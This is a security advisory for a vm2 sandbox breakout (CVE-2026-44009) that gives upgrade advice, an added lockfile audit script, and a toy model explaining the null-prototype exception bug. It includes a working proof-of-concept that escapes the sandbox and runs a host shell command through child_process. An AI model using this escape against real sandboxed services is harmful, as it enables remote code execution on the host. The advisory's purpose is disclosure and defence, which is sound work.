CVE-2026-44009: vm2 Sandbox Breakout Allows Remote Code Execution
CVSS 3.1 (GHSA): 9.8
Identifiers: GHSA-9vg3-4rfj-wgcm, CVE-2026-44009
Summary
A vulnerability in vm2 allows code running inside the sandbox to break out of it and execute arbitrary commands on the host system. An attacker who can get code executed inside a vm2 sandbox can therefore run malicious code on the host and access sensitive data. To protect your systems, upgrade vm2 to version 3.11.2 or later.
What to do
- Update vm2 to version 3.11.2 or later. Both entries in the table below are the npm package `vm2`; check nested copies installed under other dependencies as well as the top-level one, since a lockfile can pin more than one version.
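To check a project against the advice above, here is an added example (written for this page, not taken from the advisory or from the vm2 project) that walks an npm lockfile and flags every vm2 install below 3.11.2, the fixed version named on this page. The two sample lockfiles embedded in it are constructed for the example, and `FIXED_VERSION`, `findInstalls` and `auditVm2` are the example's own names.

```javascript
// Added example (not part of the advisory or of the vm2 project): list every
// copy of vm2 in an npm lockfile, including nested copies installed under other
// dependencies, and flag versions below the fixed release from the table above.
const FIXED_VERSION = '3.11.2';

// Minimal semver parser: "3.11.2" or "3.11.2-rc.1"; build metadata ("+...") is ignored.
function parseSemver(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.-]+))?(?:\+[0-9A-Za-z.-]+)?$/.exec(v);
  if (!m) throw new Error(`not a semver version: ${v}`);
  return { core: [Number(m[1]), Number(m[2]), Number(m[3])], pre: m[4] ? m[4].split('.') : null };
}

// Returns negative, zero or positive. A prerelease sorts below its release (3.11.2-rc.1 < 3.11.2).
function compareSemver(a, b) {
  const pa = parseSemver(a), pb = parseSemver(b);
  for (let i = 0; i < 3; i++) if (pa.core[i] !== pb.core[i]) return pa.core[i] - pb.core[i];
  if (!pa.pre && !pb.pre) return 0;
  if (!pa.pre) return 1;
  if (!pb.pre) return -1;
  const len = Math.max(pa.pre.length, pb.pre.length);
  for (let i = 0; i < len; i++) {
    const x = pa.pre[i], y = pb.pre[i];
    if (x === undefined) return -1;           // shorter prerelease list sorts first
    if (y === undefined) return 1;
    const nx = /^\d+$/.test(x), ny = /^\d+$/.test(y);
    if (nx && ny) { if (Number(x) !== Number(y)) return Number(x) - Number(y); }
    else if (nx) return -1;                   // numeric identifiers sort before alphanumeric ones
    else if (ny) return 1;
    else if (x !== y) return x < y ? -1 : 1;
  }
  return 0;
}

// Every install of `name` in a package-lock.json object, as {path, version}.
// lockfileVersion 2/3 keys "packages" by install path; lockfileVersion 1 nests
// "dependencies" objects, so that tree is walked recursively.
function findInstalls(lock, name) {
  const found = [];
  if (lock.packages) {
    for (const [p, entry] of Object.entries(lock.packages)) {
      if (p === `node_modules/${name}` || p.endsWith(`/node_modules/${name}`)) {
        found.push({ path: p, version: entry.version });
      }
    }
    return found;
  }
  const walk = (deps, prefix) => {
    for (const [dep, entry] of Object.entries(deps || {})) {
      const p = `${prefix}node_modules/${dep}`;
      if (dep === name) found.push({ path: p, version: entry.version });
      walk(entry.dependencies, `${p}/`);
    }
  };
  walk(lock.dependencies, '');
  return found;
}

function auditVm2(lock) {
  return findInstalls(lock, 'vm2').map(i => ({ ...i, vulnerable: compareSemver(i.version, FIXED_VERSION) < 0 }));
}

// Constructed sample lockfiles (not real projects): a patched top-level vm2
// beside a stale nested copy, plus a name-prefix decoy that must not match.
const SAMPLE_LOCK_V3 = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'app', version: '1.0.0' },
    'node_modules/vm2': { version: '3.11.2' },
    'node_modules/some-plugin': { version: '2.0.0' },
    'node_modules/some-plugin/node_modules/vm2': { version: '3.9.19' },
    'node_modules/vm2-loader': { version: '0.1.0' },
  },
};
const SAMPLE_LOCK_V1 = {
  lockfileVersion: 1,
  dependencies: {
    'some-plugin': { version: '2.0.0', dependencies: { vm2: { version: '3.11.1' } } },
  },
};

// Usage: node audit-vm2.js [path/to/package-lock.json]; falls back to the v3 sample.
if (typeof require !== 'undefined' && require.main === module) {
  const lockPath = process.argv[2];
  const lock = lockPath ? JSON.parse(require('fs').readFileSync(lockPath, 'utf8')) : SAMPLE_LOCK_V3;
  for (const r of auditVm2(lock)) {
    console.log(`${r.vulnerable ? 'VULNERABLE' : 'ok'}\t${r.path}\t${r.version}`);
  }
}
```

The path match deliberately requires a `node_modules/vm2` segment rather than a name prefix, so sibling packages such as a hypothetical `vm2-loader` are not reported; the nested v3 entry and the v1 tree both surface the stale copy that a top-level `npm ls vm2` can miss when a dependency pins its own.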
Affected software
| Ecosystem | Vendor | Product | Affected versions | Fix |
|---|---|---|---|---|
| npm | GitHub Actions | vm2 | < 3.11.2 | upgrade to 3.11.2 |
| npm | – | vm2 | < 3.11.2 | upgrade to 3.11.2 |
Original title
vm2 has Sandbox Breakout Through Null Proto Exception
Original description
### Summary
VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system.
### Details
In `handleException`, because of the change marked ``// SECURITY (post-GHSA-mpf8 hardening): use `from` (not `ensureThis`)``, an exception whose prototype is `null` is assumed to come from the other side of the bridge and is proxied. A sandbox object with a null prototype that is thrown and then caught therefore yields both its proxied and its unproxied form, which makes it possible to obtain the host `Function` object.
### PoC
```js
const {VM} = require("vm2");
const vm = new VM();
console.log(vm.run(`
  // Sandbox-created object with no prototype: the bridge cannot tell it apart
  // from a host object, so the instrumented catch hands back a host-facing proxy.
  const o = {__proto__: null};
  try {
    throw o;
  } catch (e) {
    // Writing through that proxy unwraps the sandboxed Buffer.prototype.inspect
    // to the raw host function and stores it on the raw object o.
    e.f = Buffer.prototype.inspect;
    // o.f.constructor is now the host realm's Function: reach the host process.
    o.f.constructor("return process")().mainModule.require('child_process').execSync('touch pwned');
  }
`));
```
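The PoC above depends on the bridge misclassifying a null-prototype object thrown inside the sandbox. The following is an added toy model of that classification step, written for this page and not taken from vm2: a minimal proxy membrane in a single realm whose `handleExceptionVulnerable` treats anything it cannot recognise as sandbox-owned as a host object, beside a `handleExceptionFailClosed` variant that refuses to guess. Every name in it (`SANDBOX_OBJECT_PROTO`, `HOST_PROTOS`, `wrapHost`, `originOf`, `escapeViaNullProtoThrow`) is an assumption of the model, and the fail-closed variant is one possible design choice, not the fix shipped in 3.11.2.

```javascript
// Added example, not vm2's code: a constructed toy "membrane" with the shape of
// the bug the Details section describes. Host objects that reach the sandbox are
// wrapped in a proxy whose set-trap unwraps sandbox values, so a host function
// receives raw host objects. If an exception thrown *inside* the sandbox is
// misclassified as coming from the host, the sandbox gets a host-facing proxy of
// its own object; writing through it stores a raw host value on the raw object,
// which the sandbox can then read unproxied.

// Realm model (assumption of this toy): sandbox-created objects descend from
// SANDBOX_OBJECT_PROTO; host objects descend from the real Object/Function prototypes.
const SANDBOX_OBJECT_PROTO = Object.create(null);
const HOST_PROTOS = new Set([Object.prototype, Function.prototype]);

const hostToProxy = new WeakMap();  // raw host value -> sandbox-facing proxy
const proxyToHost = new WeakMap();  // sandbox-facing proxy -> raw host value

// Convert a value coming from the sandbox into what the host side should see.
function toHost(v) {
  return proxyToHost.has(v) ? proxyToHost.get(v) : v;
}

// Wrap a raw host object for use inside the sandbox.
function wrapHost(target) {
  if (hostToProxy.has(target)) return hostToProxy.get(target);
  const proxy = new Proxy(target, {
    get(t, key) {
      const v = Reflect.get(t, key);
      return (typeof v === 'object' || typeof v === 'function') && v !== null ? wrapHost(v) : v;
    },
    // The membrane assumes `t` is a host object, so values written to it are
    // unwrapped to their raw host form. That assumption is what a misclassified
    // sandbox object breaks.
    set(t, key, value) {
      return Reflect.set(t, key, toHost(value));
    },
  });
  hostToProxy.set(target, proxy);
  proxyToHost.set(proxy, target);
  return proxy;
}

// Provenance by prototype chain: 'sandbox', 'host', or 'unknown'.
function originOf(obj) {
  for (let p = Object.getPrototypeOf(obj); p !== null; p = Object.getPrototypeOf(p)) {
    if (p === SANDBOX_OBJECT_PROTO) return 'sandbox';
    if (HOST_PROTOS.has(p)) return 'host';
  }
  return 'unknown';   // e.g. Object.create(null): no chain to classify by
}

// Vulnerable classifier (the shape the advisory describes): anything that is
// not recognisably sandbox-owned is assumed to be a host object and proxied.
function handleExceptionVulnerable(e) {
  if (e === null || (typeof e !== 'object' && typeof e !== 'function')) return e;
  if (proxyToHost.has(e)) return e;            // already a sandbox-facing proxy
  if (originOf(e) === 'sandbox') return e;     // sandbox's own object, pass through
  return wrapHost(e);                          // BUG: null-proto sandbox objects land here
}

// Fail-closed classifier (a design choice for this toy, not vm2's patch): an
// exception whose origin cannot be determined is replaced by an opaque
// sandbox-side error instead of being guessed at.
function handleExceptionFailClosed(e) {
  if (e === null || (typeof e !== 'object' && typeof e !== 'function')) return e;
  if (proxyToHost.has(e)) return e;
  switch (originOf(e)) {
    case 'sandbox': return e;
    case 'host': return wrapHost(e);
    default: {
      const opaque = Object.create(SANDBOX_OBJECT_PROTO);
      opaque.message = 'exception of unknown origin was suppressed';
      return opaque;
    }
  }
}

// Run the PoC's access pattern against a classifier. `hostFn` stands in for
// Buffer.prototype.inspect on the host side; the sandbox sees only its proxy.
// Returns true when the raw sandbox object ends up holding the raw host function.
function escapeViaNullProtoThrow(handleException) {
  const hostFn = function inspect() {};        // raw host function
  const sandboxView = wrapHost(hostFn);        // what Buffer.prototype.inspect is inside the sandbox
  const o = Object.create(null);               // sandbox-created, null prototype
  let e;
  try { throw o; } catch (thrown) { e = handleException(thrown); }  // instrumented catch
  e.f = sandboxView;                           // write through whatever the catch handed back
  return o.f === hostFn;                       // did the raw host function reach the raw object?
}

console.log('vulnerable classifier leaks host function:', escapeViaNullProtoThrow(handleExceptionVulnerable));
console.log('fail-closed classifier leaks host function:', escapeViaNullProtoThrow(handleExceptionFailClosed));
```

In a real two-realm sandbox the tell is `o.f.constructor` being the host realm's `Function`; in this single-realm model the identity check `o.f === hostFn` plays that role. The model also shows why the hardening comment quoted in the Details is a trade-off rather than a typo: the prototype chain is the only cheap provenance signal the bridge has, a null prototype carries none, and whichever side a guessing rule favours, an object from the other side will be misclassified.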
### Impact
Attackers can perform Remote Code Execution under the assumption that arbitrary code can be executed inside the context of a vm2 sandbox.
Vulnerability type: CWE-668 (Exposure of Resource to Wrong Sphere)
Published: 8 May 2026 · Updated: 23 May 2026 · First seen: 8 May 2026